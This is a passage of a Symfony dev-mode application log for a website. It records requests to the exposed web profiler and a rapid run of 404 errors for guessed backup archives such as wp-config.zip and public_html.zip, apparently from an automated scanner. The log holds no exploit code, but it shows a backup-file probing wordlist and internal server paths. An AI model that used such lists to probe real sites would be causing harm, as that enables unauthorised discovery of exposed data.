  3250. [2025-12-18 06:17:29] request.INFO: Matched route "_profiler". {"route":"_profiler","route_parameters":{"_controller":"web_profiler.controller.profiler:panelAction","token":"latest","_route":"_profiler"},"request_uri":"https://www.unda.co/_profiler/latest?ip=212.47.64.207&limit=10","method":"GET"} []
  3251. [2025-12-18 06:17:29] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://www.unda.co/_profiler/search_bar?ip=212.47.64.207&limit=10","method":"GET"} []
  3252. [2025-12-18 06:20:19] request.INFO: Matched route "_profiler_search_results". {"route":"_profiler_search_results","route_parameters":{"_controller":"web_profiler.controller.profiler:searchResultsAction","token":"408a13","_route":"_profiler_search_results"},"request_uri":"https://www.unda.co/_profiler/408a13/search/results?limit=10&method=GET","method":"GET"} []
  3253. [2025-12-18 06:20:19] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://www.unda.co/_profiler/search_bar?limit=10&method=GET","method":"GET"} []
  3254. [2025-12-18 06:20:38] request.INFO: Matched route "_profiler". {"route":"_profiler","route_parameters":{"_controller":"web_profiler.controller.profiler:panelAction","token":"d7d5e3","_route":"_profiler"},"request_uri":"https://unda.co/_profiler/d7d5e3?panel=twig","method":"GET"} []
  3255. [2025-12-18 06:20:38] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://unda.co/_profiler/search_bar?panel=twig","method":"GET"} []
  3256. [2025-12-18 06:20:40] request.INFO: Matched route "_profiler". {"route":"_profiler","route_parameters":{"_controller":"web_profiler.controller.profiler:panelAction","token":"d7d5e3","_route":"_profiler"},"request_uri":"https://unda.co/_profiler/d7d5e3?panel=security","method":"GET"} []
  3257. [2025-12-18 06:20:40] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://unda.co/_profiler/search_bar?panel=security","method":"GET"} []
  3258. [2025-12-18 06:23:26] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /root.zip"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /root.zip\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0):  at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
  3259. [2025-12-18 06:23:26] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /websites.zip"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /websites.zip\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0):  at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
  3260. [2025-12-18 06:23:26] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /sites.zip"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /sites.zip\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0):  at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
  3261. [2025-12-18 06:23:26] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /site.zip"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /site.zip\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0):  at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
  3262. [2025-12-18 06:23:26] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /subdomain.zip"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /subdomain.zip\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0):  at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
  3263. [2025-12-18 06:23:26] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /public_html.zip"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /public_html.zip\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0):  at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
  3264. [2025-12-18 06:23:26] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /wwwroot.zip"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /wwwroot.zip\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0):  at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
  3265. [2025-12-18 06:23:26] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /wordpress-admin.zip"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /wordpress-admin.zip\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0):  at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
  3266. [2025-12-18 06:23:26] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /wordpress.zip"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /wordpress.zip\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0):  at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
  3267. [2025-12-18 06:23:26] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /wordpress-site.zip"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /wordpress-site.zip\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0):  at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
  3268. [2025-12-18 06:23:26] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /htdocs.zip"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /htdocs.zip\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0):  at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
  3269. [2025-12-18 06:23:26] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /wp-admin.zip"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /wp-admin.zip\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0):  at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
  3270. [2025-12-18 06:23:26] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /clients.zip"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /clients.zip\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0):  at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
  3271. [2025-12-18 06:23:26] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /html.zip"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /html.zip\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0):  at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
  3272. [2025-12-18 06:23:26] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /client.zip"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /client.zip\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0):  at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
  3273. [2025-12-18 06:23:26] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /portal.zip"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /portal.zip\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0):  at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
  3274. [2025-12-18 06:23:26] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /wp-2024.zip"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /wp-2024.zip\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0):  at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
  3275. [2025-12-18 06:23:26] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /wp-full.zip"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /wp-full.zip\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0):  at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
  3276. [2025-12-18 06:23:26] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /index.zip"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /index.zip\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0):  at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
  3277. [2025-12-18 06:23:26] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /public.zip"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /public.zip\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0):  at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
  3278. [2025-12-18 06:23:27] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /downloads.zip"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /downloads.zip\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0):  at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
  3279. [2025-12-18 06:23:28] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /wp-config.zip"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /wp-config.zip\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0):  at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
  3280. [2025-12-18 06:23:28] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /wordpress-config.zip"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /wordpress-config.zip\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0):  at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
  3281. [2025-12-18 06:23:29] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /media.zip"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /media.zip\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0):  at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
  3282. [2025-12-18 06:23:29] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /images.zip"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /images.zip\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0):  at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
  3283. [2025-12-18 06:23:29] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /wp-complete.zip"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /wp-complete.zip\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0):  at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
  3284. [2025-12-18 06:23:29] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /inetpub.zip"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /inetpub.zip\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0):  at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
  3285. [2025-12-18 06:23:29] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /web.zip"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /web.zip\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0):  at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
  3286. [2025-12-18 06:23:29] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /website.zip"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /website.zip\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0):  at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
  3287. [2025-12-18 06:23:29] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /home.zip"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /home.zip\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0):  at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
  3288. [2025-12-18 06:23:29] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /wordpress-backup.zip"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /wordpress-backup.zip\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0):  at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
  3289. [2025-12-18 06:23:29] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /wp-files.zip"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /wp-files.zip\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0):  at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
  3290. [2025-12-18 06:23:29] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /documents.zip"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /documents.zip\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0):  at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
  3291. [2025-12-18 06:23:29] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /static.zip"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /static.zip\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0):  at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
  3292. [2025-12-18 06:23:29] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /assets.zip"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /assets.zip\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0):  at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
  3293. [2025-12-18 06:23:29] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /app.zip"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /app.zip\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0):  at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
  3294. [2025-12-18 06:23:29] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /www.zip"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /www.zip\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0):  at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
  3295. [2025-12-18 06:23:29] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /microservices.zip"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /microservices.zip\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0):  at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
  3296. [2025-12-18 06:23:29] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /service.zip"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /service.zip\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0):  at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
  3297. [2025-12-18 06:23:29] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /attachments.zip"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /attachments.zip\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0):  at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
